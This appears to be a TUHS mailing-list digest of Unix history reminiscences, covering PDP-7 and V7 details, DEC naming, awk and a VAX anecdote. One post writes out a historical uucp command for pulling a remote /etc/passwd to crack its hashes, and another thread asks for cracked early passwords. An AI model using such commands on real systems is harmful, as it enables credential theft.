> From: Warren Toomey <wkt(a)tuhs.org>
> But wasn't "chdir" built into the PDP-7 Unix shell?
No. See "The Evolution of the Unix Time-sharing System", in section "Process
control".
Also, the old 'cd' had different syntax than today's (since there was no notion
of a pathname in the earliest Unix); it took instead a list of directories (e.g.
"cd dd ken").
Noel
On 10/21/19 9:05 AM, tuhs-request(a)minnie.tuhs.org wrote:
> Message: 17
> Date: Mon, 21 Oct 2019 08:10:00 -0400 (EDT)
> From: jnc@mercury.lcs.mit.edu (Noel Chiappa)
> To: tuhs@minnie.tuhs.org
> Cc: jnc@mercury.lcs.mit.edu
> Subject: Re: [TUHS] What was your "Aha, Unix!" moment?
> Message-ID: <20191021121000.34E3B18C09F(a)mercury.lcs.mit.edu>
>
> > From: Warren Toomey<wkt(a)tuhs.org>
>
> > But wasn't "chdir" built into the PDP-7 Unix shell?
>
> No. See "The Evolution of the Unix Time-sharing System", in section "Process
> control".
>
> Also, the old 'cd' had different syntax than today's (since there was no notion
> of a pathname in the earliest Unix); it took instead a list of directories (e.g.
> "cd dd ken").
>
> Noel
>
Wanna have some fun?
chdir system
then try to find your way back 'home'...
v0's subdirectories suck.
--
GPG Fingerprint: 68F4 B3BD 1730 555A 4462 7D45 3EAA 5B6D A982 BAAF
On the copy of this story that appears here:
http://crash.com/fun/texts/vaxen-dont.html
it is attributed as such:
'The author of this piece is Jack Harvey, harvey(at)eisner.decus.org, and
it was originally published under the title "The Immortal Murderer" on
January 18th, 1989 on DECUServe, the DECUS member bulletin board.'
--Pat.
In `UNIX Assembler Reference Manual,' Dennis credits Knuth
for numeric temporary labels, with a reference to volume 1
of The Art of Computer Programming.
I'm several thousand kilometers from my copy of Knuth (though
rather nearer to Knuth himself, albeit not within asking
range), so I'll leave it to others to track down the exact
reference.
Norman Wilson
Toronto ON
(temporarily Sacramento CA)
{Been meaning to get to this one for a while...}
> From: Pat Barron <patbarron(a)acm.org>
> The idea of processes being able to talk to each other (without some
> kind of pre-arrangement, like setting up a pipe between them, or using
> temporary files) was just amazing ... On V7m, I stumbled across the
> mpx(5) man page.
It's probably worth pointing out that before V7, stock Unix _didn't_ have a
way for two un-related processes to communicate, hence the invention of port()
by Rand. See:
https://minnie.tuhs.org//cgi-bin/utree.pl?file=BBN-V6
https://minnie.tuhs.org//cgi-bin/utree.pl?file=BBN-V6/doc/ipc
(Note: BBN did _not_ do the original port() stuff, they just used it.)
Noel
A little off-topic, but quite amusing...
-- Dave
---------- Forwarded message ----------
Time to post this classic; I don't recall who wrote it. Note that the
references are pretty obscure now...
-----
VAXen, my children, just don't belong some places. In my business, I am
frequently called by small sites and startups having VAX problems. So when a
friend of mine in an Extremely Large Financial Institution (ELFI) called me one
day to ask for help, I was intrigued because this outfit is a really major VAX
user - they have several large herds of VAXen - and plenty of sharp VAXherds to
take care of them.
So I went to see what sort of an ELFI mess they had gotten into. It seems they
had shoved a small 750 with two RA60s running a single application, PC style,
into a data center with two IBM 3090s and just about all the rest of the disk
drives in the world. The computer room was so big it had three street
addresses. The operators had only IBM experience and, to quote my friend, they
were having "a little trouble adjusting to the VAX", were a bit hostile towards
it and probably needed some help with system management. Hmmm, hostility...
Sigh.
Well, I thought it was pretty ridiculous for an outfit with all that VAX muscle
elsewhere to isolate a dinky old 750 in their Big Blue Country, and said so
bluntly. But my friend patiently explained that although small, it was an
"extremely sensitive and confidential application." It seems that the 750 had
originally been properly clustered with the rest of a herd and in the care of
one of their best VAXherds. But the trouble started when the Chief User went
to visit his computer and its VAXherd.
He came away visibly disturbed and immediately complained to the ELFI's
Director of Data Processing that, "There are some very strange people in there
with the computers." Now since this user person was the Comptroller of this
Extremely Large Financial Institution, the 750 had been promptly hustled over
to the IBM data center which the Comptroller said, "was a more suitable place."
The people there wore shirts and ties and didn't wear head bands or cowboy
hats.
So my friend introduced me to the Comptroller, who turned out to be five feet
tall, 85 and a former gnome of Zurich. He had a young apprentice gnome who was
about 65. The two gnomes interviewed me in whispers for about an hour before
they decided my modes of dress and speech were suitable for managing their
system and I got the assignment.
There was some confusion, understandably, when I explained that I would
immediately establish a procedure for nightly backups. The senior gnome seemed
to think I was going to put the computer in reverse, but the apprentice's son
had an IBM PC and he quickly whispered that "backup" meant making a copy of a
program borrowed from a friend and why was I doing that? Sigh.
I was shortly introduced to the manager of the IBM data center, who greeted me
with joy and anything but hostility. And the operators really weren't hostile
- it just seemed that way. It's like the driver of a Mack 18 wheeler, with a
condo behind the cab, who was doing 75 when he ran over a moped doing its best
to get away at 45. He explained sadly, "I really warn't mad at mopeds but to
keep from runnin' over that'n, I'da had to slow down or change lanes!"
Now the only operation they had figured out how to do on the 750 was reboot it.
This was their universal cure for any and all problems. After all it works on a
PC, why not a VAX? Was there a difference? Sigh.
But I smiled and said, "No sweat, I'll train you. The first command you learn
is HELP" and proceeded to type it in on the console terminal. So the data
center manager, the shift supervisor and the eight day-operators watched the
LA100 buzz out the usual introductory text. When it finished they turned to me
with expectant faces and I said in an avuncular manner, "This is your most
important command!"
The shift supervisor stepped forward and studied the text for about a minute.
He then turned with a very puzzled expression on his face and asked, "What do
you use it for?" Sigh.
Well, I tried everything. I trained and I put the doc set on shelves by the
750 and I wrote a special 40 page doc set and then a four page doc set. I
designed all kinds of command files to make complex operations into simple
foreign commands and I taped a list of these simplified commands to the top of
the VAX. The most successful move was adding my home phone number.
The cheat sheets taped on the top of the CPU cabinet needed continual
maintenance, however. It seems the VAX was in the quietest part of the data
center, over behind the scratch tape racks. The operators ate lunch on the CPU
cabinet and the sheets quickly became coated with pizza drippings, etc.
But still the most used solution to hangups was a reboot and I gradually got
things organized so that during the day when the gnomes were using the system,
the operators didn't have to touch it. This smoothed things out a lot.
Meanwhile, the data center was getting new TV security cameras, a halon gas
fire extinguisher system and an immortal power source. The data center manager
apologized because the VAX had not been foreseen in the plan and so could not
be connected to immortal power. The VAX and I felt a little rejected but I
made sure that booting on power recovery was working right. At least it would
get going again quickly when power came back.
Anyway, as a consolation prize, the data center manager said he would have one
of the security cameras adjusted to cover the VAX. I thought to myself,
"Great, now we can have 24 hour video tapes of the operators eating Chinese
takeout on the CPU." I resolved to get a piece of plastic to cover the cheat
sheets.
One day, the apprentice gnome called to whisper that the senior was going to
give an extremely important demonstration. Now I must explain that what the
750 was really doing was holding our National Debt. The Reagan administration
had decided to privatize it and had quietly put it out for bid. My Extremely
Large Financial Institution had won the bid for it and was, as ELFIs are wont
to do, making an absolute bundle on the float.
On Monday the Comptroller was going to demonstrate to the board of directors
how he could move a trillion dollars from Switzerland to the Bahamas. The
apprentice whispered, "Would you please look in on our computer? I'm sure
everything will be fine, sir, but we will feel better if you are present. I'm
sure you understand?" I did.
Monday morning, I got there about five hours before the scheduled demo to check
things over. Everything was cool. I was chatting with the shift supervisor
and about to go upstairs to the Comptroller's office. Suddenly there was a
power failure.
The emergency lighting came on and the immortal power system took over the load
of the IBM 3090s. They continued smoothly, but of course the VAX, still on
city power, died. Everyone smiled and the dead 750 was no big deal because it
was 7 AM and gnomes don't work before 10 AM. I began worrying about whether I
could beg some immortal power from the data center manager in case this was a
long outage.
Immortal power in this system comes from storage batteries for the first five
minutes of an outage. Promptly at one minute into the outage we hear the gas
turbine powered generator in the sub-basement under us automatically start up
getting ready to take the load on the fifth minute. We all beam at each other.
At two minutes into the outage we hear the whine of the backup gas turbine
generator starting. The 3090s and all those disk drives are doing just fine.
Business as usual. The VAX is dead as a door nail but what the hell.
At precisely five minutes into the outage, just as the gas turbine is taking
the load, city power comes back on and the immortal power source commits
suicide. Actually it was a double murder and suicide because it took both
3090s with it.
So now the whole data center was dead, sort of. The fire alarm system had its
own battery backup and was still alive. The lead acid storage batteries of the
immortal power system had been discharging at a furious rate keeping all those
big blue boxes running and there was a significant amount of sulfuric acid
vapor. Nothing actually caught fire but the smoke detectors were convinced it
had.
The fire alarm klaxon went off and the siren warning of imminent halon gas
release was screaming. We started to panic but the data center manager shouted
over the din, "Don't worry, the halon system failed its acceptance test last
week. It's disabled and nothing will happen."
He was half right, the primary halon system indeed failed to discharge. But the
secondary halon system observed that the primary had conked and instantly did
its duty, which was to deal with Dire Disasters. It had twice the capacity and
six times the discharge rate.
Now the ear splitting gas discharge under the raised floor was so massive and
fast, it blew about half of the floor tiles up out of their framework. It came
up through the floor into a communications rack and blew the cover panels off,
decking an operator. Looking out across that vast computer room, we could see
the air shimmering as the halon mixed with it.
We stampeded for exits to the dying whine of 175 IBM disks. As I was escaping
I glanced back at the VAX, on city power, and noticed the usual flickering of
the unit select light on its system disk indicating it was happily rebooting.
Twelve firemen with air tanks and axes invaded. There were frantic phone calls
to the local IBM Field Service office because both the live and backup 3090s
were down. About twenty minutes later, seventeen IBM CEs arrived with dozens
of boxes and, so help me, a barrel. It seems they knew what to expect when an
immortal power source commits murder.
In the midst of absolute pandemonium, I crept off to the gnome office and
logged on. After extensive checking it was clear that everything was just fine
with the VAX and I began to calm down. I called the data center manager's
office to tell him the good news. His secretary answered with, "He isn't
expected to be available for some time. May I take a message?" I left a
slightly smug note to the effect that, unlike some other computers, the VAX was
intact and functioning normally.
Several hours later, the gnome was whispering his way into a demonstration of
how to flick a trillion dollars from country 2 to country 5. He was just
coming to the tricky part, where the money had been withdrawn from Switzerland
but not yet deposited in the Bahamas. He was proceeding very slowly and the
directors were spellbound. I decided I had better check up on the data center.
Most of the floor tiles were back in place. IBM had resurrected one of the
3090s and was running tests. What looked like a bucket brigade was working on
the other one. The communication rack was still naked and a fireman was
standing guard over the immortal power corpse. Life was returning to normal,
but the Big Blue Country crew was still pretty shaky.
Smiling proudly, I headed back toward the triumphant VAX behind the tape racks
where one of the operators was eating a plump jelly bun on the 750 CPU. He saw
me coming, turned pale and screamed to the shift supervisor, "Oh my God, we
forgot about the VAX!" Then, before I could open my mouth, he rebooted it. It
was Monday, 19-Oct-1987. VAXen, my children, just don't belong some places.
-- Dave
where did the relative labels come from? I still show them to people
when we're doing assembly and still use them all the time. Most people
have not seen them and find them wonderfully convenient. I know they
were in as by the time I came along in 1976; when did they first show
up?
I'm amused (in a good way) that this thread persists, and
without becoming boring.
Speaking as someone who was Ken's sysadmin for six years,
I find it hard to get upset over someone cracking a password
hash that has been out in the open for decades, using an
algorithm that became pragmatically unsafe slightly fewer
decades ago. It really shouldn't be in use anywhere any
more anyway. Were I still Ken's sysadmin I'd have leaned
on him to change it long ago.
So far as I know, my password from that era didn't escape
the Labs, but nevertheless I abandoned it long ago--when
I left the Labs myself, in fact.
I do have one password that has been unchanged since the
mid-1990s and is stored in heritage hash on a few computers
that don't even have /etc/shadow, but those are not public
systems. And it's probably time I changed it anyway.
None of this is to excuse the creeps who steal passwords
these days, nor to promote complacency. At the place I now
work we had a possible /etc/shadow exposure some years back,
and we reacted by pushing everyone to change their passwords
and also by taking various measures to keep even the hashes
better-hidden. But there is, or should be, a difference
between a password that is still in use and one that was exposed
so long ago, and in what is now so trivial an algorithm, that
it is no more than a puzzle for fans of the old-fart days.
Norman Wilson
Toronto ON
Apropos of OCR on shabby typewriting, I've had good luck with doing
the OCR twice with the paper differently positioned, then using diff
to spot discrepancies. For a final proofreading, a team of two--one
reading the original aloud, the other checking the copy--works much
faster and more accurately than a single person checking side-by-side
texts.
Doug
Back in the heyday of uucp, some sites were lazy and allowed
uucico access to any file in the file system (that was accessible
to the uucp user). A common ploy for white hats and black hats
was to try
uucp remotesys!/etc/passwd ~/remotesys
or the like, and see what came in and whether it had any easy
hashes (shadow password files didn't quite exist yet).
The system known to the uucp world as research! was more
careful: / was mapped to /usr/spool/uucp. We left a phony
etc/passwd file there, containing plausible-looking entries
with hashes that, if cracked, spelled out
why
are
you
wasting
your
time
I don't remember whether anyone ever stole it by uucp, though
I think Bill Cheswick used it to set up the phony system
environment for Berferd to play in (Google for `cheswick berferd'
if you don't know the story).
Norman Wilson
Toronto ON
THE EARLIEST UNIX CODE: AN ANNIVERSARY SOURCE CODE RELEASE
http://bit.ly/31pWcvM
Cheers,
Lyle
--
73 NM6Y
Bickley Consulting West Inc.
https://bickleywest.com
"Black holes are where God is dividing by zero"
> From: jnc(a)mercury.lcs.mit.edu (Noel Chiappa)
>
> > From: Doug McIlroy
>
> > doing legwork for Multics I ran the following experiment on a lot of
> > then-current time-sharing systems.
>
> Fascinating; you don't happen to remember the ones you tried, do you?
>
> Also, when you say "legwork for Multics", was this something done during
> the planning stages (so, say '64-'65), or later on?
It was probably 1965. The places we visited
included at least Rand, NBS, Michigan, and Dartmouth.
I specifically remember trying the experiment
at Michigan and Dartmouth. There were other places,
too, but they've dropped from memory.
Doug
I don't know that I had a single "Aha!" moment, but there were a few
things that just got hold of me and led me down the Unix path...
The first Unix I used was V7m on a PDP-11/40, in college. By this point,
I was "aware" of Unix, in theory I even knew C - but never had an actual
system to try it out on until this point. I'd used other operating
systems (or things that called themselves operating systems...), primarily
TRSDOS, CP/M, OS1100, TOPS-10, TOPS-20, and VMS. Unix was certainly the
first multiuser operating system that I ever had administrator access on.
1) The idea of taking the output of one program, and using it directly as
input to another program - and the simplicity by which it was done -
was revolutionary to me. It was not unusual for me at that time to do
things like this by having the first program create a temporary file,
and then having another program open this temporary file and use it as
input, but the whole paradigm of stdin/stdout/pipes made it so you
didn't even have to "know" in your program that you might need to use
the output of some other program (via a temporary file) as input.
That was amazing to me.
2) Unix was really the first operating system that I had full, buildable
sources for. (I theoretically had access to VMS source code, but it
was on microfiche and not in machine-readable form, so it was just a
read-only reference.) If I wanted to see how the OS was doing
something, I could look. If I wanted to change something the OS did,
or add something to the OS (either in the kernel, or as a user space
utility), I could do that (and I did on a couple of occasions). If
something was broken, I could try to figure it out and fix it. There
was this bug in V7m, where if you were on a non-separate I&D system
that didn't have the floating point option (and our 11/40 did not), and
you tried to run an "a.out" file that was zero length, you'd get a
kernel panic. We were using the system for a computer architecture
course, students were programming in assembly language, and if there
was a problem with the source file the assembler would leave a zero
length executable behind. Of course, students would try to run it
anyway, even though "as" produced errors. We'd sometimes get 3 or 4
system crashes in the course of an evening. The students and the
instructors were all up in arms because any time this would happen,
everyone would lose whatever they were working on (and maybe more, if
the filesystem got messed up during the panic), and if there was no one
around who had a key to the computer room when it happened, it would
stay down until they could find someone who had physical access and the
knowledge to know how to deal with "fsck"... (The construction in the
lab was pretty minimal, and the walls to most of the rooms didn't go
all the way to the ceiling - sometimes when it crashed and no one was
around, they'd take to climbing over the wall to reboot the system
themselves - which could produce disastrous results if there were
filesystem issues...) I found the problem, and I fixed it. That was
my first adventure in kernel debugging... (Later, we migrated to a
PDP-11/24 and we ordered the KEF11-A floating point option for it, so
that problem became moot.)
3) The idea of processes being able to talk to each other (without some
kind of pre-arrangement, like setting up a pipe between them, or
using temporary files) was just amazing, and this was the first time
I'd really seen it. I knew VMS had this thing called a "mailbox",
but I never used it for anything and didn't even know what it was
for. On V7m, I stumbled across the mpx(5) man page. I think the
first time I came across it, I stared at it for hours, looking at
the description and trying to figure out what you'd even use that
functionality for. At some point it was like a lightning bolt hit
me - "Oh, wait! You can use this to send messages between unrelated
processes!" Except V7m came with one little proviso - the mpx code
was there, but it didn't work... So I dug into it, and made it work -
at least, well enough for what I wanted to use it for. I wrote a
multiuser chat program with it (isn't that the first thing any
undergrad does when they discover interprocess communications? :-) ).
I had a similar epiphany with sockets on 4.2BSD a year or two later,
under similar circumstances. The one thing I found in common with
both mpx and sockets was that the documentation described the
low-level functionality - but there was nothing that clearly stated,
"This functionality is used to allow processes to talk to each other"...
I'm sure there are plenty more experiences with early Unix that ensured
that I'd continue down this path, but I think these are my favorites.
--Pat.
Possibly the most time consuming install I did was installing Xenix on a
bunch of Intel i310 systems. Xenix was a "secondary" OS for these
systems, the main OS being iRMX. Xenix for these systems was distributed
on 5.25" floppies. Lots and lots of floppies... They came in a 3-ring
binder, many pages of floppies... We also had a couple of i380 systems,
Xenix for those came on 8" floppies... That was time consuming, but it
was just manual labor.
The most unpleasant install I can recall was AIX 2.2.1 on the IBM-PC/RT.
Which also was really (under the covers) Interactive UNIX, with some other
stuff mixed in. Not only was this also time-consuming with a binder full
of 5.25" floppies, but my recollection is that there were too many
opportunities to make a tiny little mistake during the install and have to
start all over again.
--Pat.
Apropos of Steve Johnson's evocative description of JCL and other
pre-Unix OS interfaces, doing legwork for Multics I ran the following
experiment on a lot of then-current time-sharing systems.
As a model of creating and installing a new compiler, I used a very
short Fortran program that simply copied its input to its output,
stopping after finding END in column 7 of the input. The drill was
compile the program
run it, using its own source as input
compile the freshly made output file
This failed on every system I tried it on, though local
experts could intervene with magic to overcome the
gratuitous file-type distinctions that typically
got in the way. Dartmouth's DTSS came closest, but
inexplicably, even to the gurus, it had a special
prohibition against a program reading the source
from which it was compiled.
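(For contrast, on Unix the whole drill is an unremarkable three-line shell
transcript; the file and compiler names below are illustrative, not part of
the original experiment:
    f77 -o copy copy.f            # compile the program
    ./copy < copy.f > copy2.f     # run it, feeding it its own source as input
    f77 -o copy2 copy2.f          # compile the freshly made output file
Source, input, and output are all just files of bytes, so nothing gets in
the way.)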
Incidentally, my favorite manifestation of JCL-like mumbo jumbo
was the ironically named FUTIL control card in GECOS.
Doug
> From: Doug McIlroy
> doing legwork for Multics I ran the following experiment on a lot of
> then-current time-sharing systems.
Fascinating; you don't happen to remember the ones you tried, do you?
Also, when you say "legwork for Multics", was this something done during
the planning stages (so, say '64-'65), or later on?
Noel
I wrote a UNIX shell based on Python the other night in case anyone's
interested: https://github.com/terrycojones/daudin Apologies for a modern
instead of an historic subject...
Terry
FYI. I sent this to one of the lead DOC people from the old days to see if she knew. Here is her answer.
Begin forwarded message:
> From: "Janet Egan"
> Date: October 11, 2019 at 7:53:16 PM EDT
> To: "'Clem Cole'"
> Subject: RE: Curious Question from the Ether about use of Upper and Lower case at DEC
>
> Hi Clem,
>
> Hmm, I don’t remember whether the style guide addressed that. In the docs for RSX-11M and such I always wrote it “PDP-11”, that is upper case with the dash. I do remember the logo on the machine as always lower case with no dash. The PDP-8 had the same style logo. And you’re right about seeing the lower case on the cover of the handbooks. I have never seen the lower case with the dash or the upper case without it. I don’t think I still have my copy of the style guide. Maybe I’ll take a look around my archives for it.
>
> What a fun question to be thinking about .
> Janet
>
>
> From: Clem Cole
> Sent: Friday, October 11, 2019 9:47 AM
> To: Janet Egan
> Subject: Curious Question from the Ether about use of Upper and Lower case at DEC
>
> Janet,
I'm part of The Unix Historical Society (TUHS) mailing list and a topic came up that I thought you might be able to shed some light on. The observation was that 'DEC seemed to have a schizophrenic attitude with respect to upper and lower case in the PDP-11 brand,' i.e. sometimes using "PDP-11" and sometimes "pdp11" (but I note rarely if ever PDP11 or pdp-11). For instance, the logo on the system itself was all lower: pdp11/40. DEC documentation mostly used upper case in the text, but covers could go either way, e.g. the "pdp11 peripherals handbook" (to transcribe the cover exactly), which nonetheless uses upper case "PDP-11" several times on pg 1-1 and the same on the binding. But I could not find examples of pdp-11 or PDP11, i.e. all lower with the dash or all upper without it.
>
> Do you remember if there were rules or guidelines and if so what they might have been?
>
> Thanks,
> Clem
I was reminded of this by Larry's comment:
> I miss Brian on this list. I've interacted with him over the years, the
> one I remember the most was I was trying to do an awk like interface to a
> key/value "database".
Recently I've had to deal with a lot of data in CSV
(comma-separated-value) format. Awk is *almost* perfect for this, but
of course doesn't handle the quoting of fields that contain commas.
One can usually work around it by finding a character that doesn't
occur in the data and converting the CSV file to use that as the
separator, but it's not ideal.
Awk's input could easily be modified to handle CSV files, but output
would be a bit more difficult, because you don't specify field
boundaries explicitly on output. One possibility would be a printf()
format specifier that takes a field and quotes it appropriately.
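As a sketch of the separator-conversion workaround (using gawk's FPAT
extension rather than classic awk; the field pattern is essentially the one
from the gawk manual and assumes no embedded newlines or escaped quotes, and
'|' and data.csv are just stand-ins for a character absent from the data and
for the input file):
    gawk -v OFS='|' 'BEGIN { FPAT = "([^,]+)|(\"[^\"]+\")" }
                     { $1 = $1; print }' data.csv |
        awk -F'|' '{ print $3 }'
The $1 = $1 assignment forces gawk to rebuild the record with the new
separator, after which ordinary awk is perfectly happy.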
-- Richard
> From: Arnold Skeeve
> K&R was so dense that my head was swimming after the first read.
I learned C from "Programming in C - A Tutorial", by Brian Kernighan, which
for some reason seemed to have fallen into desuetude from V7 on (at least,
that was the impression I got). Which was a pity, it was one of the best
documents I ever read - a breeze to read through, and clear as crystal.
Noel
Not sure I had an "aha erlebnis" with UNIX. I'd done some testing on a
Philips PTS6000 with T.O.S. All assembler code with debugging syslod
the most fun (breakpointing code which moves itself in memory). Then I
was a user on VAX 11/730, 11/750 with Ultrix which was a bit of a step
down. The VAXes ran VMS during the week and only on weekends could we
place our disk pack and boot Ultrix. Funny feeling to go home when
colleagues arrive in the morning.
Later "Propriety UNIX" versions based on System III, 7, V. No source.
Still had shells, command line, scripts, a bit of programming in C if
all else fails (or is too slow). Never liked Windows. In that sense
maybe more an 'aha windows' moment to quickly forget :-)
Cheers,
uncle rubl
Well, I guess mine is kinda weird. I had messed with a number of
computer systems a little bit and then became proficient with 516-TSS
as a result of being part of the explorer scout post at BTL Murray
Hill in high school. Interesting note is that one of my advisors
who wrote a lot of 516-TSS interviewed Ken for his job at BTL.
Ended up with a paid job at BTL starting near the end of my senior
year of high school. Needed to document my work. Don't remember
why, but my group acquired a PDP-11/40 that was across the hall
from the 516 lab in building 2 that was running UNIX version 3.
I started using roff on it to do my documentation which meant
learning ed and a bunch of other tools. Of course, I took the
manual home and read it cover to cover and started messing around
with the various cool tools that it had and was hooked.
Jon
> From: Tony Travis
> It's always puzzled me when everyone talks about [the] PDP11 when, in
> fact, it says "pdp11" on the system itself:
DEC documentation mostly used uppercase in the text; e.g. the "pdp11
peripherals handbook" (to transcribe the cover exactly) uses "PDP-11"
several times on pg 1-1.
Noel
> From: Warren Toomey
> What was your "ahah" moment when you first saw that Unix was special,
> especially compared to the systems you'd previously used?
Sometime in my undergrad sophomore year, IIRC. A friend had an undergrad
research thing with DSSR, who I think at that point had the first UNIX at
MIT. He showed me the system, and wrote a tiny command in C, compiled it, and
executed the binary from the shell.
No big deal, right? Well, at that point ('75 or so), the only OS's I had used
were RSTS-11, a batch system running on an Interdata (programs were submitted
on card decks), the DELPHI system (done by the people in DSSR), and a few
similar things. I had never used a system where an ordinary user could 'add' a
command to the command interpreter, and was blown away. (At that point in
time, not many OS's could do that.)
Unix was in a whole different world compared to contemporaneous PDP-11
OS's. It felt like a 'mainframe' OS (background jobs, etc), but on a mini.
Noel
For a contrast in aha moments, consider this introduction to
an early Apple (Apple II, I think).
When my wife got one, my natural curiosity led me to try to
make "Hello world".
I asked her what to use as an editor and learned it all depends
on what you're editing.
So I looked in the manual. First thing you do to make a C program
is to set up a "project", as if it was a corporate undertaking.
I found it easier to write a program in some other editor than
the one for C. Bad idea. Every file had a type and that editor
produced files of some type other than C program.
After succumbing to the Apple straitjacket, I succeeded.
Then I found "Hello world" given as an example in the manual.
The code took up almost a page; real men make programs that
set up their own windows.
Aha, Apple! Not intended for programmers.
And that didn't change until OS X.
Doug
I miss Brian on this list. I've interacted with him over the years, the
one I remember the most was I was trying to do an awk like interface to a
key/value "database". I talked to him about it and he sent me ~bwk/awk
which had all the original awk source and the troff source to the awk
book in english and french.
Ken, Doug, Rob, Steve, anyone, could you coax him onto this list?
If you want me to try first I will, I don't know if he remembers me
or not. But I can try and then maybe one of you follow up?
All, we just had about a dozen new subscribers to the TUHS list. Rather than
e-mail you all individually, I thought I'd use the list itself to say
"Welcome!".
The TUHS list generally has a high signal/noise ratio on the history of
Unix, the systems and software, and anecdotes from those who used the
various flavours. Occasionally, we drift a bit off-topic and I'll gently
nudge the conversation back to Unix history.
The list archives are at: https://minnie.tuhs.org/pipermail/tuhs/
and you should browse the last couple of months to get a feel for
what we talk about.
Cheers, Warren
https://bsdimp.blogspot.com/2019/10/video-footage-of-first-pdp-7-to-run-uni…
is a blog entry where I step through the evidence that the PDP-7 in The
Incredible Machine video that was posted here a while ago is quite likely
the PDP-7 Ken used to create Unix after its days of starring in Bell Labs
films were over...
Warner
I've lugged these around for 35-ish years. I'd like to see them
scanned and stored someplace as permanent as can be found, so if
someone/anyone could tell me how to facilitate that, I'll package
them for shipping.
My apologies if this has already been done and I'm simply not aware of it.
I have other stuff that probably needs the same treatment, but
excavating the alluvial layers that have accumulated will take time.
Single small-format red binder:
Unix System User Reference Manual - AT&T Bell Labs
Unix System Release 2.0
including Division 452 standard and local commands
October 1985
Set of four small format gray binders:
Documenter's Workbench 1.0, April 1984
1. Introduction and Reference Manual, 307-150, issue 2
2. Text Formatter Reference, 307-151, issue 2
3. Macro Package Reference, 307-152 issue 2
4. Preprocessor Reference, 307-153, issue 2
Set of two slip-cased small format maroon/gray binders:
Unix System V Documenters Workbench Release 2.0
1. Technical Discussion and Reference 310-005, issue 1
2. Product Overview 999-805-007IS, User Guide 999-805-006IS,
Reference Card 999-805-008IS, issue 1
---rsk
I’ve got a few books I’ve just pulled off the shelf and no longer want/need.
I’m hoping someone will give them a good home.
UNIX System Labs Inc UNIX(r) System V Release 4
Programmers Guide: System Services and Application Packaging Tools
Device Driver Interface/Driver-Kernel Interface (DDI/DKI) Reference Manual (2 copies)
AT&T 3B2/3B5/3B15 Computers Assembly Programming Manual
Sun Microsystems Inc (Sun Technical Reports)
The UNIX System - 1985
Sun 3 Architecture - 1986
I’m willing to split postage on mailing them wherever. If you are local (San Diego)
I’m willing to meet you wherever for an exchange and a coffee.
David
(Also posted on the cctalk mailing list)
I am surprised not to find any scans of an early (pre-1980) Seventh Edition
Unix Programmer's Manual. Does anyone have any? (We do have the source
files, and I see the volume 2 manual scanned from later years.)
Also, where is a copy of the new license introduced with v7? I have copies
of the 1973 and 1974 ones. Anyone have a scanned later version?
from etc/rc:
echo "Restricted rights: Use, duplication, or disclosure
is subject to restrictions stated in your contract with
Western Electric Company, Inc." >/dev/console
Thanks,
Jeremy C. Reed
echo Ohl zl obbx uggc://errqzrqvn.arg/obbxf/csfrafr/ | \
tr "Onoqrsuvxzabcefghl" "Babdefhikmnoprstuy"
> From: Lars Brinkhoff
> There was no 635 at Project MAC, was there?
I seem to recall reading about one. And in:
https://multicians.org/chrono.html
there's this entry: "08/65 GE 635 delivered to Project MAC". Clicking on the
'GE 635' link leads to "MIT's GE-635 system was installed on the ninth floor
of 545 Tech Square in 1965, and used to support a simulated 645 until the real
hardware was delivered."
Noel
The Dallas Ft. Worth UNIX Users Group
will be highlighting the 50th anniversary on October 10,
November 14, and maybe in December.
http://www.dfwuug.org/wiki/Main/Welcome
I will be presenting about the early history next week
and then about BSD-specific history in November.
Any of you in the DFW area? Any suggestions on anyone local to invite? I
am also looking for anyone local who can display old hardware or
materials at the event. I only have some old books and training
materials from the 1980's.
Does anyone have scanned copies of the early Lions commentary? (Not the 2000
printing, unless it looks identical; please let me know.)
I will try to share my slides to this list by end of this week. (I did
look at an early draft of Warner's slides, but didn't look at his final
slides nor watch his presentation yet. My presentation is from scratch
for now.)
Jeremy C. Reed
echo Ohl zl obbx uggc://errqzrqvn.arg/obbxf/csfrafr/ | \
tr "Onoqrsuvxzabcefghl" "Babdefhikmnoprstuy"
> Was patent department that first used Unix on PDP-11 and roff (~1971)
> same department that would later handle Unix licensing two years later?
> (~1973)
No. The former was the BTL legal and patent department. The latter was
at AT&T (or perhaps Western Electric).
Doug
> From: Lars Brinkhoff
> Unfortunately it's very small.
There's a larger version hiding 'behind' it.
There are very few 645 images. There's the large painting of a 645, which
for many years hung in the hallway on the 5th floor of Tech Sq:
https://multicians.org/645artist.html
Noel
Hi, I remember that someone had recovered some ancient /etc/passwd files
and had decrypted(?) them, and I remember reading that either ken or
dmr's
password was something interesting like './,..,/' (it was entirely
punctuation characters, was around three different characters in total,
and
was pretty damn short). I've tried to find this since, as a friend was
interested in it, and I cannot for the life of me find it!
Do any of you remember or have a link? :)
Thanks!
--
"Too enough is always not much!"
OK. I've shared my slides for the talk.
Some of the family trees are simplified (V7 doesn't have room for all its
ports, for example)
Some of it is a little cheeseball since I'm also trying to be witty and
entertaining (we'll see how that goes).
Please don't share them around until after my talk on September 20th.
I'd like feedback on the bits I got wrong. Or left out. Or if you're in
this and don't want to be, etc.
All the slides after the Questions slide won't be presented and will likely
be deleted.
https://docs.google.com/presentation/d/177KxOif5oHARyIdZHDq-OO67_GVtMkzIAlD…
Please be kind (but if it sucks, please do tell). I've turned on commenting
on the slides. Probably best if you comment there.
I have a video of me giving this talk, but it's too rough to share...
Thanks for any help you can give me.
Warner
So my kid is using LaTex and I'd like to show him what troff can do.
For the record, back when he was born, 20 years ago, I was program
chair for Linux Expo (which sounds like a big deal but all it meant
was I had the job of formatting the proceedings). LaTex was a big
deal but I pushed people towards troff and the few people that took
the push came back and said "holy crap is this easy".
My kid is a math guy, does anyone have some eqn input and output
that they can share?
Thanks,
--lm
"why is the formatting so weird" someone asked me.
I am guessing, looking at RFC 1, that it was formatted with an
ancestor of runoff but ... anyone?
ron
> From: Warren Toomey
> All, I'm just musing where is the best place to store Unix
> documentation. My Unix Archive is really just a filesystem, so it's not
> so good to capture and search metadata.
> Is anybody using archive.org, gunkies or something else
BitSavers seems to be the canonical location for old computer documentation.
The CHWiki (gunkies.org) isn't really the best place to put original documentation,
but that's where I'd recommend putting meta-data. As for searching meta-data, are
you speaking of something more powerful than Google?
Noel
PS: Speaking of old Unix documentation, I recently acquired a paper copy of the
PDP-11 V6 Unix manual. Is that something I should scan? I don't know if you
already have it (I know where to find sources in the archives, but I don't
know where documentation scans live.)
> The scans for v0 code are in lowercase. I assume printed on TTY 37.
> But why is the early PDP-7 code in lowercase?
Once you've used a device with lower case, upper case looks as
offensive as a ransom note. I went through this in moving "up"
from Whirlwind to IBM's 704. By 1969, we'd all had lower-case
terminals in our homes for several years.
